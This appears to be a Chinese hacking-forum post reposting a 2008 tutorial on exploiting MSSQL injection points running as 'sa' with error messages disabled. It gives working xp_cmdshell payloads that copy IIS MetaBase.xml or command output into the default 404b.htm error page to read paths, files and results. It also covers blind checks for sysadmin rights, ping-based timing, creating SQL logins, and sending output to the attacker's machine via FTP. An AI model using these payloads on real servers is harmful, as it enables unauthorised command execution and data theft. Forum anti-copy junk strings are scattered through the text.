找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2059|回复: 0
打印 上一主题 下一主题

28度的冰注入技巧之(一)——404页面的妙用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:15:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。/ z7 b- F8 g# p

; k0 x! b+ S+ `" ^- r; q- m  虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。( }) m: n* G& X$ k0 S

5 o) m4 ]3 z* h7 O4 H' e" b3 E  这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。
9 Q0 Z1 S+ b/ G9 r7 ^" p. i: p
+ I$ [5 w+ m7 Z4 i5 ]$ E  IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm
3 q  @4 o9 r' t$ b$ W( d+ Q# i! D" A" t) [- ~- D
  得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--* r. L) r& @0 M! i0 s
5 y+ @3 B( R- n3 t7 ]5 R
  ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
- ^5 q5 M' {" \4 V8 ^7 c& h: J( E  Q: |6 C# A# w7 k* u
  执行命令得到回显
+ t& L+ n$ Q+ _+ B% o; s/ t
8 d  K' Q( j: Y5 C$ R  通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
6 l& X/ }& }: \: v1 g. W9 z2 Z9 f7 A- B( b% D% J
  得到文件也shi相同,把文件copy到404b.htm就行了
. U$ Z" H4 M& \# n( k3 O) _7 n- ~
9 o3 F+ O9 i3 [  by 28ice, 2008/6/26
1 T+ l8 {3 ]% m3 @# y" E7 T6 j* u8 [7 y4 a5 z* O- R0 I
  摘自 28度的冰* G. W% Q! i) Y
8 g# A, y, k5 x! O/ {
  盲注判断权限和操作系统版本1 e8 T( ?* r2 f0 t% S# G; b, c1 D
7 V2 p5 z. p8 o5 ]6 z# N: \% l9 ]
  首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?
9 w) B6 R' K; `% n$ C
" U# Q5 U+ {! @$ K9 [  最简单的,可能以用这样的方法:$ ~1 ^2 L5 m( l  j
/ a5 [6 E1 G# T7 d4 d/ X
  1=(select IS_SRVROLEMEMBER(’sysadmin’))
" u- C1 K" C7 @5 S. }
) S' [/ E! _$ z3 B  当然,有些情况下,这个方法并不奏效。$ Z! ~  k1 B) y) J6 Y; {
7 G$ V* s6 W$ d3 B
  既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
3 e& i$ T. _3 H  H! N: ^, X
2 ]% `- H+ I  [& ]6 N2 L1 S7 M  有个3办法可能以解决这个问题9 ^: f& n% L' L& d

4 G, P2 c. W7 y' A+ X8 z( u: w  a.把执行结果写到404b.htm,具体请看我的上一篇文章9 U. u) b$ S) ^3 r0 P' h& m

6 o1 S. h3 A3 g  b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
- N8 z7 c- p: u3 d6 O/ n
7 M" a- o% P, l& j9 U  c.如果1433端口可能以连接,那干脆新建个sql登录5 W+ C0 n9 G8 B' G9 o- N3 j) p

1 `- ]# V" t$ P/ Y  d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数6 g* ~, N% a$ b6 I- }9 ?8 S& t& x

5 R7 T* e" M) ^. x6 k5 l  还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
# \5 s& }8 E, s9 s. W& B: i1 b+ \. q
  很简单
2 U' x+ o# U2 \& F( r# T3 Z5 V0 r2 U7 m2 s3 V2 @4 S, l
  执行systeminfo
  @- R+ r( h/ a$ Q
* ]) X' S0 l. T5 e+ |  在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表